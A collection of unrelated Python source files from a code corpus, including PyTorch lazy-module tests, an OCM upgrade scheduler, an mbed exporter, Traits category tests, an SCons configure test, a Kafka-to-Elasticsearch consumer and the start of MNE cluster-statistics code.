self._check_lazy_conv_pickle(nn.Conv1d, nn.LazyConv1d, (32, 2), (192, 16, 50),
(32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv1d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv1d(16, 32, 2),
lambda: nn.LazyConv1d(32, 2),
(32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv2d(self):
self._check_lazy_conv(nn.Conv2d, nn.LazyConv2d, torch.nn.functional.conv2d,
(32, 2), (192, 16, 8, 6), (32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv2d_pickle(self):
self._check_lazy_conv_pickle(nn.Conv2d, nn.LazyConv2d, (32, 2), (192, 16, 8, 6),
(32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv2d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv2d(16, 32, 2),
lambda: nn.LazyConv2d(32, 2),
(32, 16, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d(self):
self._check_lazy_conv(nn.Conv3d, nn.LazyConv3d, torch.nn.functional.conv3d,
(32, 2), (192, 16, 8, 7, 6), (32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d_pickle(self):
self._check_lazy_conv_pickle(nn.Conv3d, nn.LazyConv3d, (32, 2), (192, 16, 8, 7, 6),
(32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv3d(16, 32, 2),
lambda: nn.LazyConv3d(32, 2),
(32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transposed1d(self):
self._check_lazy_conv(nn.ConvTranspose1d, nn.LazyConvTranspose1d, torch.nn.functional.conv_transpose1d,
(32, 2), (192, 16, 50), (16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose1d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose1d, nn.LazyConvTranspose1d, (32, 2),
(192, 16, 50), (16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose1d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose1d(16, 32, 2),
lambda: nn.LazyConvTranspose1d(32, 2),
(16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d(self):
self._check_lazy_conv(nn.ConvTranspose2d, nn.LazyConvTranspose2d, torch.nn.functional.conv_transpose2d,
(32, 2), (192, 16, 8, 6), (16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose2d, nn.LazyConvTranspose2d, (32, 2),
(192, 16, 8, 6), (16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose2d(16, 32, 2),
lambda: nn.LazyConvTranspose2d(32, 2),
(16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d(self):
self._check_lazy_conv(nn.ConvTranspose3d, nn.LazyConvTranspose3d, torch.nn.functional.conv_transpose3d,
(32, 2), (192, 16, 8, 7, 6), (16, 32, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose3d, nn.LazyConvTranspose3d, (32, 2),
(192, 16, 8, 7, 6), (16, 32, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose3d(16, 32, 2),
lambda: nn.LazyConvTranspose3d(32, 2),
(16, 32, 2, 2, 2), (32,))
def _check_lazy_norm(self, cls, lazy_cls, input_shape):
for affine in [False, True]:
for track_running_stats in [False, True]:
lazy_module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
if affine:
self.assertIsInstance(lazy_module.weight, UninitializedParameter)
self.assertIsInstance(lazy_module.bias, UninitializedParameter)
if track_running_stats:
self.assertIsInstance(lazy_module.running_mean, UninitializedBuffer)
self.assertIsInstance(lazy_module.running_var, UninitializedBuffer)
input = torch.ones(*input_shape)
lazy_output = lazy_module(input)
self.assertIsInstance(lazy_module, cls)
self.assertNotIsInstance(lazy_module, lazy_cls)
num_features = input_shape[1]
module = cls(num_features, affine=affine, track_running_stats=track_running_stats)
expected_output = module(input)
self.assertEqual(lazy_output, expected_output)
if module.weight is not None:
self.assertEqual(lazy_module.weight.shape, module.weight.shape)
self.assertEqual(lazy_module.weight, module.weight)
if module.bias is not None:
self.assertEqual(lazy_module.bias.shape, module.bias.shape)
self.assertEqual(lazy_module.bias, module.bias)
if module.running_mean is not None:
self.assertEqual(lazy_module.running_mean.shape, module.running_mean.shape)
self.assertEqual(lazy_module.running_mean, module.running_mean)
if module.running_var is not None:
self.assertEqual(lazy_module.running_var.shape, module.running_var.shape)
self.assertEqual(lazy_module.running_var, module.running_var)
if module.num_batches_tracked is not None:
self.assertEqual(lazy_module.num_batches_tracked.shape, module.num_batches_tracked.shape)
self.assertEqual(lazy_module.num_batches_tracked, module.num_batches_tracked)
def _check_lazy_norm_pickle(self, cls, lazy_cls, input_shape):
for affine in [False, True]:
for track_running_stats in [False, True]:
module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, lazy_cls)
if affine:
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
if track_running_stats:
self.assertIsInstance(module.running_mean, UninitializedBuffer)
self.assertIsInstance(module.running_var, UninitializedBuffer)
input = torch.ones(*input_shape)
module(input) # fully materialized
module = pickle.loads(pickle.dumps(module))
self.assertNotIsInstance(module, lazy_cls)
self.assertIsInstance(module, cls)
if affine:
self.assertNotIsInstance(module.weight, UninitializedParameter)
self.assertNotIsInstance(module.bias, UninitializedParameter)
if track_running_stats:
self.assertNotIsInstance(module.running_mean, UninitializedBuffer)
self.assertNotIsInstance(module.running_var, UninitializedBuffer)
def _check_lazy_batchnorm_state(self, cls, lazy_cls):
module = cls(10)
lazy_module = lazy_cls(affine=True, track_running_stats=True)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# Conv one until the first iteration. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertEqual(lazy_module.weight.shape, (10,))
self.assertEqual(lazy_module.bias.shape, (10,))
self.assertEqual(lazy_module.running_mean.shape, (10,))
self.assertEqual(lazy_module.running_var.shape, (10,))
module = cls(10)
lazy_module = lazy_cls()
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def _check_lazy_instancenorm_state(self, cls, lazy_cls):
for affine in [False, True]:
for track_running_stats in [False, True]:
module = cls(10, affine=affine, track_running_stats=track_running_stats)
lazy_module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# InstanceNorm one until the first iteration. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
if affine:
self.assertEqual(lazy_module.weight.shape, (10,))
self.assertEqual(lazy_module.bias.shape, (10,))
if track_running_stats:
self.assertEqual(lazy_module.running_mean.shape, (10,))
self.assertEqual(lazy_module.running_var.shape, (10,))
module = cls(10, affine=True, track_running_stats=True)
lazy_module = lazy_cls(affine=True, track_running_stats=True)
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def test_lazy_batchnorm1d(self):
self._check_lazy_norm(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 3, 6))
self._check_lazy_norm(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 6))
def test_lazy_batchnorm1d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 3, 6))
self._check_lazy_norm_pickle(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 6))
def test_lazy_batchnorm1d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm1d, nn.LazyBatchNorm1d)
self._check_lazy_batchnorm_state(nn.BatchNorm1d, nn.LazyBatchNorm1d)
def test_lazy_batchnorm2d(self):
self._check_lazy_norm(nn.BatchNorm2d, nn.LazyBatchNorm2d, (16, 3, 6, 7))
def test_lazy_batchnorm2d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm2d, nn.LazyBatchNorm2d, (16, 3, 6, 7))
def test_lazy_batchnorm2d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm2d, nn.LazyBatchNorm2d)
self._check_lazy_batchnorm_state(nn.BatchNorm2d, nn.LazyBatchNorm2d)
def test_lazy_batchnorm3d(self):
self._check_lazy_norm(nn.BatchNorm3d, nn.LazyBatchNorm3d, (16, 3, 6, 7, 8))
def test_lazy_batchnorm3d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm3d, nn.LazyBatchNorm3d, (16, 3, 6, 7, 8))
def test_lazy_batchnorm3d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm3d, nn.LazyBatchNorm3d)
self._check_lazy_batchnorm_state(nn.BatchNorm3d, nn.LazyBatchNorm3d)
def test_lazy_instancenorm1d(self):
self._check_lazy_norm(nn.InstanceNorm1d, nn.LazyInstanceNorm1d, (16, 3, 6))
def test_lazy_instancenorm1d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm1d, nn.LazyInstanceNorm1d, (16, 3, 6))
def test_lazy_instancenorm1d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm1d, nn.LazyInstanceNorm1d)
self._check_lazy_instancenorm_state(nn.InstanceNorm1d, nn.LazyInstanceNorm1d)
def test_lazy_instancenorm2d(self):
self._check_lazy_norm(nn.InstanceNorm2d, nn.LazyInstanceNorm2d, (16, 3, 6, 7))
def test_lazy_instancenorm2d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm2d, nn.LazyInstanceNorm2d, (16, 3, 6, 7))
def test_lazy_instancenorm2d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm2d, nn.LazyInstanceNorm2d)
self._check_lazy_instancenorm_state(nn.InstanceNorm2d, nn.LazyInstanceNorm2d)
def test_lazy_instancenorm3d(self):
self._check_lazy_norm(nn.InstanceNorm3d, nn.LazyInstanceNorm3d, (16, 3, 6, 7, 8))
def test_lazy_instancenorm3d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm3d, nn.LazyInstanceNorm3d, (16, 3, 6, 7, 8))
def test_lazy_instancenorm3d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm3d, nn.LazyInstanceNorm3d)
self._check_lazy_instancenorm_state(nn.InstanceNorm3d, nn.LazyInstanceNorm3d)
@suppress_warnings
def test_materialize_dtype(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.test_param.materialize(10)
self.assertTrue(module.test_param.dtype == torch.float64)
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.half()
module.test_param.materialize(10)
self.assertTrue(module.test_param.dtype == torch.float16)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@suppress_warnings
def test_materialize_device(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.test_param.materialize(10)
self.assertTrue(module.test_param.device.type == 'cpu')
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.cuda()
module.test_param.materialize(10)
self.assertTrue(module.test_param.device.type == 'cuda')
@suppress_warnings
def test_chained_initialization(self):
class MyNetwork(torch.nn.Module):
def __init__(self):
super(MyNetwork, self).__init__()
self.linear_1 = torch.nn.LazyLinear(15)
self.linear_2 = torch.nn.LazyLinear(10)
def forward(self, x):
y = self.linear_1(x)
return self.linear_2(y)
net = MyNetwork()
net(torch.ones(5, 10))
self.assertTrue(net.linear_1.weight.shape == (15, 10))
self.assertTrue(net.linear_1.bias.shape == (15,))
self.assertTrue(net.linear_2.weight.shape == (10, 15))
self.assertTrue(net.linear_2.bias.shape == (10,))
@suppress_warnings
def test_optimizer_pass(self):
optimizers = [torch.optim.Adadelta, torch.optim.Adagrad, torch.optim.Adam,
torch.optim.AdamW, torch.optim.Adamax,
torch.optim.ASGD, torch.optim.SGD, torch.optim.Rprop,
torch.optim.RMSprop, torch.optim.LBFGS]
def run_step(module, optim):
self.assertIsInstance(optim.param_groups[0]['params'][0], UninitializedParameter)
module.test_param.materialize(10)
self.assertIsInstance(optim.param_groups[0]['params'][0], Parameter)
self.assertNotIsInstance(optim.param_groups[0]['params'][0], UninitializedParameter)
for p in module.parameters():
p.grad = torch.rand_like(p)
if isinstance(optim, torch.optim.LBFGS):
optim.step(lambda: 1.0)
else:
optim.step()
for optim_cls in optimizers:
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
if optim_cls is torch.optim.SGD:
optim = optim_cls(module.parameters(), lr=0.0)
elif optim_cls is torch.optim.Adagrad:
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
optim = optim_cls(module.parameters())
continue
else:
optim = optim_cls(module.parameters())
run_step(module, optim)
@suppress_warnings
def test_weight_norm(self):
m = nn.LazyLinear(7)
with self.assertRaisesRegex(ValueError, 'have uninitialized parameters.'):
m = torch.nn.utils.weight_norm(m)
@suppress_warnings
def test_spectral_norm(self):
m = nn.LazyLinear(7)
with self.assertRaisesRegex(ValueError, 'have uninitialized parameters.'):
m = torch.nn.utils.spectral_norm(m)
@suppress_warnings
def test_invalid_functions(self):
param = torch.nn.parameter.UninitializedParameter()
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
torch.empty_like(param)
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
torch.add(param, param)
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
param + param
class TestFunctionalPickle(TestCase):
# issue gh-38137
def test_pickle_softsign(self):
# Make sure it does not throw an exception
s = pickle.dumps(F.softsign)
class TestStateDictHooks(TestCase):
def test_load_state_dict_pre_hook(self):
m = nn.Linear(10, 10)
m_state_dict = m.state_dict()
m_load = nn.Linear(10, 10)
hook_called = 0
def hook_without_module(state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
self.assertEqual(m_state_dict, state_dict)
nonlocal hook_called
hook_called += 1
def hook_with_module(module, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
self.assertEqual(m_state_dict, state_dict)
self.assertTrue(m_load is module)
nonlocal hook_called
hook_called += 1
hook_called = 0
m_load._register_load_state_dict_pre_hook(hook_without_module)
m_load.load_state_dict(m_state_dict)
self.assertEqual(1, hook_called)
hook_called = 0
m_load._register_load_state_dict_pre_hook(hook_with_module, True)
m_load.load_state_dict(m_state_dict)
self.assertEqual(2, hook_called)
def test_load_state_dict_module_pre_hook(self):
hook_called = 0
# Test with module instance method as hook
class MyModule(nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.foo = torch.nn.Parameter(torch.rand(10))
def my_pre_load_hook(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
assert [] == error_msgs
assert [] == unexpected_keys
assert [] == missing_keys
assert strict
nonlocal hook_called
hook_called += 1
def my_pre_load_hook_with_module(
self,
module,
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
):
assert [] == error_msgs
assert [] == unexpected_keys
assert [] == missing_keys
assert strict
assert self is module
nonlocal hook_called
hook_called += 1
m = MyModule()
state_dict = m.state_dict()
hook_called = 0
m._register_load_state_dict_pre_hook(m.my_pre_load_hook)
m.load_state_dict(state_dict)
self.assertEqual(1, hook_called)
hook_called = 0
m._register_load_state_dict_pre_hook(m.my_pre_load_hook_with_module, True)
m.load_state_dict(state_dict)
self.assertEqual(2, hook_called)
instantiate_device_type_tests(TestNNDeviceType, globals())
if __name__ == '__main__':
run_tests()
|
the-stack_0_19820 | import sys
import logging
import reconcile.queries as queries
from utils.ocm import OCMMap
QONTRACT_INTEGRATION = 'ocm-upgrade-scheduler'
def fetch_current_state(clusters):
settings = queries.get_app_interface_settings()
ocm_map = OCMMap(clusters=clusters, integration=QONTRACT_INTEGRATION,
settings=settings)
current_state = []
for cluster in clusters:
cluster_name = cluster['name']
ocm = ocm_map.get(cluster_name)
upgrade_policies = \
ocm.get_upgrade_policies(cluster_name, schedule_type='automatic')
for upgrade_policy in upgrade_policies:
upgrade_policy['cluster'] = cluster_name
current_state.append(upgrade_policy)
return ocm_map, current_state
def fetch_desired_state(clusters):
desired_state = []
for cluster in clusters:
cluster_name = cluster['name']
upgrade_policy = cluster['upgradePolicy']
upgrade_policy['cluster'] = cluster_name
desired_state.append(upgrade_policy)
return desired_state
def calculate_diff(current_state, desired_state):
diffs = []
err = False
for d in desired_state:
c = [c for c in current_state
if d.items() <= c.items()]
if not c:
d['action'] = 'create'
diffs.append(d)
for c in current_state:
d = [d for d in desired_state
if d.items() <= c.items()]
if not d:
c['action'] = 'delete'
diffs.append(c)
return diffs, err
def sort_diffs(diff):
if diff['action'] == 'delete':
return 1
else:
return 2
def act(dry_run, diffs, ocm_map):
diffs.sort(key=sort_diffs)
for diff in diffs:
action = diff.pop('action')
cluster = diff.pop('cluster')
logging.info([action, cluster])
if not dry_run:
ocm = ocm_map.get(cluster)
if action == 'create':
ocm.create_upgrade_policy(cluster, diff)
elif action == 'delete':
ocm.delete_upgrade_policy(cluster, diff)
def run(dry_run, gitlab_project_id=None, thread_pool_size=10):
clusters = queries.get_clusters()
clusters = [c for c in clusters if c.get('upgradePolicy') is not None]
if not clusters:
logging.debug("No upgradePolicy definitions found in app-interface")
sys.exit(0)
ocm_map, current_state = fetch_current_state(clusters)
desired_state = fetch_desired_state(clusters)
diffs, err = calculate_diff(current_state, desired_state)
act(dry_run, diffs, ocm_map)
if err:
sys.exit(1)
|
the-stack_0_19821 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from exporters import Exporter
from os.path import splitext, basename
class CodeSourcery(Exporter):
NAME = 'CodeSourcery'
TOOLCHAIN = 'GCC_CS'
TARGETS = [
'LPC1768',
'UBLOX_C027',
'ARCH_PRO',
]
DOT_IN_RELATIVE_PATH = True
def generate(self):
# "make" wants Unix paths
self.resources.win_to_unix()
to_be_compiled = []
for r_type in ['s_sources', 'c_sources', 'cpp_sources']:
r = getattr(self.resources, r_type)
if r:
for source in r:
base, ext = splitext(source)
to_be_compiled.append(base + '.o')
libraries = []
for lib in self.resources.libraries:
l, _ = splitext(basename(lib))
libraries.append(l[3:])
ctx = {
'name': self.program_name,
'to_be_compiled': to_be_compiled,
'object_files': self.resources.objects,
'include_paths': self.resources.inc_dirs,
'library_paths': self.resources.lib_dirs,
'linker_script': self.resources.linker_script,
'libraries': libraries,
'symbols': self.toolchain.get_symbols()
}
self.gen_file('codesourcery_%s.tmpl' % self.target.lower(), ctx, 'Makefile')
|
the-stack_0_19822 | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: David C. Morrill
# Description: <Traits component>
#------------------------------------------------------------------------------
import unittest
from enthought.traits.api import HasTraits, Category, Str, TraitError
class Base( HasTraits ) :
y = Str("Base y")
z = Str("Base z")
class BaseExtra( Category, Base ) :
x = Str("BaseExtra x")
class BasePlus( Category, Base ) :
p = Str("BasePlus p")
# z = Str("BasePlus z") overrides not allowed.
class BasePlusPlus( BasePlus ) :
pp = Str("BasePlusPlus pp")
class CategoryTestCase( unittest.TestCase ) :
""" Test cases for traits category """
def setUp( self ) :
self.base = Base()
return
def test_base_category(self) :
""" Base class with traits """
self.assertEqual( self.base.y, "Base y", msg="y != 'Base y'" )
self.assertEqual( self.base.z, "Base z", msg="z != 'Base z'" )
return
def test_extra_extension_category(self) :
""" Base class extended with a category subclass """
self.assertEqual( self.base.x, "BaseExtra x", msg="x != 'BaseExtra x'" )
return
def test_plus_extension_category(self) :
""" Base class extended with two category subclasses """
self.assertEqual( self.base.x, "BaseExtra x", msg="x != 'BaseExtra x'" )
self.assertEqual( self.base.p, "BasePlus p", msg="p != 'BasePlus p'" )
return
def test_subclass_extension_category(self) :
""" Category subclass does not extend base class.
This test demonstrates that traits allows subclassing of a category
class, but that the traits from the subclass are not actually added
to the base class of the Category.
Seems like the declaration of the subclass (BasePlusPlus) should fail.
"""
try :
x = self.base.pp
self.fail( msg="base.pp should have thrown AttributeError "
"as Category subclassing is not supported." )
except AttributeError :
pass
basepp = BasePlusPlus()
return
def test_subclass_instance_category(self) :
""" Category subclass instantiation not supportted.
This test demonstrates that traits allows subclassing of a category
class, that subclass can be instantiated, but the traits of the parent
class are not inherited.
Seems like the declaration of the subclass (BasePlusPlus) should fail.
"""
bpp = BasePlusPlus()
self.assertEqual( bpp.pp, "BasePlusPlus pp",
msg="pp != 'BasePlusPlus pp'" )
try :
self.assertEqual( bpp.p, "BasePlus p", msg="p != 'BasePlus p'" )
self.fail( msg="bpp.p should have thrown SystemError as "
"instantiating a subclass of a category is not supported." )
except SystemError :
pass
return
#
# support running this test individually, from the command-line as a script
#
if __name__ == '__main__':
unittest.main()
#### EOF ######################################################################
|
the-stack_0_19823 | from __future__ import print_function, absolute_import
from numpy.linalg import norm as euclidean
from numpy import array
class SubjectModel:
def __init__(self, num_s_samples,
pose_x=None, pose_y=None, pose_z=None, rad=0.6, height=1.7):
"""
Height is defined in $SPHINX_ROOT/actors/pedestrian.actor
Radius is checked by placing the pedestrian in a cylinder in the simulation.
rad=0.5 also works (still ok)
:param pose_x:
:param pose_y:
:param pose_z:
:param rad:
:param height:
"""
self.x = (-1, pose_x)
self.y = (-1, pose_y)
self.z = (-1, pose_z)
self.radius = float(rad)
self.height = float(height)
def __repr__(self):
return "(Subject ({},{},{}))".format(self.x[1], self.y[1], self.z[1])
def reset(self):
"""Resets the model to default values"""
self.x = (-1, None)
self.y = (-1, None)
self.z = (-1, None)
def set_val(self, ts, uid, val):
if uid == "x":
self.x = (ts, val)
elif uid == "y":
self.y = (ts, val)
elif uid == "z":
self.z = (ts, val)
def check_if_pos(self, uid):
val = {"x": self.x[1], "y": self.y[1], "z": self.z[1]}.get(uid)
return val == None
def get_pos(self):
"""A nice way to implement it would be checking timestamp on 3 coords"""
return (self.x[1], self.y[1], self.z[1])
def complete(self):
"""
Checks if the position data is right, i.e., all the timestamps are
the same and the data is not empty.
"""
(t1, x) = self.x
(t2, y) = self.y
(t3, z) = self.z
return ((-1) != t1 == t2 == t3) and all([t is not None for t in [x,y,z]])
def distance_to(self, point):
"""
:param point: A tuple (x,y,z)
"""
curr_pose = array([self.x[1], self.y[1], self.z[1]])
if point[2] <= self.height:
# Ignore Z axis
dist = euclidean(array(point[:2]), curr_pose[:2]) - self.radius
else:
# Use maximum height and no radius
centr = curr_pose + array([0, 0, self.height])
dist = euclidean(array(centr), array(point))
return dist
|
the-stack_0_19824 | import setuptools
from os import path
with open("README.md", "r") as fh:
long_description = fh.read()
def parse_requirements(filename):
""" load requirements from a pip requirements file """
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
setuptools.setup(
name="pandiet",
version="0.1.7",
author="Makoto Yui",
author_email="[email protected]",
license = "BSD-3-Clause",
license_file = "LICENSE",
description="A library to reduce memory consumption of Pandas Dataframes",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/myui/pandiet",
project_urls={
'Bug Tracker': 'https://github.com/myui/pandiet/issues',
'Source': 'https://github.com/myui/pandiet/',
},
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
# Specify the Python versions you support here.
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=setuptools.find_packages(),
install_requires=parse_requirements('requirements.txt'),
setup_requires=["pytest-runner"],
tests_require=["pytest", "pytest-cov"],
python_requires=">=3.7,<4",
) |
the-stack_0_19826 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Configure/build-fail.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that Configure tests work even after an earlier test fails.
This was broken in 0.98.3 because we'd mark the /usr/bin/g++ compiler
as having failed (because it was on the candidates list as the implicit
command dependency for both the object file and executable generated
for the configuration test) and then avoid trying to rebuild anything
else that used the "failed" Node.
Thanks to Ben Webb for the test case.
"""
import os
import re
import TestSCons
_obj = TestSCons._obj
test = TestSCons.TestSCons(match = TestSCons.match_re_dotall)
test.subdir('a', 'b')
a_boost_hpp = os.path.join('..', 'a', 'boost.hpp')
b_boost_hpp = os.path.join('..', 'b', 'boost.hpp')
test.write('SConstruct', """\
import os
def _check(context):
for dir in ['a', 'b']:
inc = os.path.join('..', dir, 'boost.hpp')
result = context.TryRun('''
#include "%s"
int main() { return 0; }
''' % inc, '.cpp')[0]
if result:
import sys
sys.stdout.write('%s: ' % inc)
break
context.Result(result)
return result
env = Environment()
conf = env.Configure(custom_tests={'CheckBoost':_check})
conf.CheckBoost()
conf.Finish()
""")
test.write(['b', 'boost.hpp'], """#define FILE "b/boost.hpp"\n""")
expect = test.wrap_stdout(read_str = "%s: yes\n" % re.escape(b_boost_hpp),
build_str = "scons: `.' is up to date.\n")
test.run(arguments='--config=force', stdout=expect)
expect = test.wrap_stdout(read_str = "%s: yes\n" % re.escape(a_boost_hpp),
build_str = "scons: `.' is up to date.\n")
test.write(['a', 'boost.hpp'], """#define FILE "a/boost.hpp"\n""")
test.run(arguments='--config=force', stdout=expect)
test.run()
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_0_19827 | from kafka import KafkaConsumer
from json import loads
import sys,weakref
from datetime import datetime
from elasticsearch import Elasticsearch
consumer = KafkaConsumer(
# You should update the topic name like teb_topic
'teb_topic',
bootstrap_servers=['localhost:9092'],
api_version=(0,10),
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id='my-group',
value_deserializer=lambda x: loads(x.decode('utf-8')))
es = Elasticsearch()
i=0
print("before for")
for message in consumer:
message = message.value
res = es.index(index="test-index", doc_type='log', id=i, body=message)
#print(res['result'])
res = es.get(index="test-index", doc_type='log', id=i)
print(res['_source'])
sys.stdout.write(res['_source'])
i = i + 1
es.indices.refresh(index="test-index")
if i == 10:
break
#res = es.search(index="test-index", body={"query": {"match_all": {}}})
#print("Got %d Hits:" % res['hits']['total'])
#for hit in res['hits']['hits']:
# print("%(log_date)s %(author)s: %(text)s" % hit["_source"])
# sys.stdout.write(str(message)) |
the-stack_0_19831 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Authors: Thorsten Kranz <[email protected]>
# Alexandre Gramfort <[email protected]>
# Martin Luessi <[email protected]>
# Eric Larson <[email protected]>
# Denis Engemann <[email protected]>
#
# License: Simplified BSD
import numpy as np
from scipy import stats, sparse, ndimage
import warnings
import logging
from .parametric import f_oneway
from ..parallel import parallel_func, check_n_jobs
from ..utils import split_list, logger, verbose, ProgressBar
from ..fixes import in1d, unravel_index
from ..source_estimate import SourceEstimate
def _get_clusters_spatial(s, neighbors):
"""Helper function to form spatial clusters using neighbor lists
This is equivalent to _get_components with n_times = 1, with a properly
reconfigured connectivity matrix (formed as "neighbors" list)
"""
# s is a vector of spatial indices that are significant, like:
# s = np.where(x_in)[0]
# for x_in representing a single time-instant
r = np.ones(s.shape, dtype=bool)
clusters = list()
next_ind = 0 if s.size > 0 else None
while next_ind is not None:
# put first point in a cluster, adjust remaining
t_inds = [next_ind]
r[next_ind] = False
icount = 1 # count of nodes in the current cluster
while icount <= len(t_inds):
ind = t_inds[icount - 1]
# look across other vertices
buddies = np.where(r)[0]
buddies = buddies[in1d(s[buddies], neighbors[s[ind]],
assume_unique=True)]
t_inds += buddies.tolist()
r[buddies] = False
icount += 1
# this is equivalent to np.where(r)[0] for these purposes, but it's
# a little bit faster. Unfortunately there's no way to tell numpy
